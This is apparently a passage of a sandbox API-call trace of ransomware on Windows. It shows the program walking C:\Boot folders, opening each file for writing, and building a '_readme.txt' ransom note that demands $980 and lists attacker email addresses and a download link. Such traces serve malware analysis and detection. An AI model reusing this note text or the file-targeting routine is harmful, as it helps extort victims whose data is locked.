ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.930] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.930] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.931] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.931] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\bootmgr.exe.mui") returned=".mui" [0165.931] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.931] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0165.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.931] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b44f60 [0165.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.931] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0165.931] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.931] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44f60 | out: hHeap=0xcd0000) returned 1 [0165.932] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0165.932] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.932] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.932] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.932] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.932] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.933] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.933] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.933] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.933] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.933] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.933] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.933] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0165.933] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0165.933] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.933] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0165.933] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.933] PathFindFileNameW (pszPath="") returned="" [0165.933] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.934] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.934] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.934] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.934] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0165.934] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.934] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.934] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0165.934] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0165.934] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.934] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.934] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.935] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.935] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.935] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.935] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0165.935] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0165.935] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.935] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.935] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0165.935] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0165.936] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.936] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.936] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.937] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.937] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.938] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0165.938] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.938] HeapFree (in: 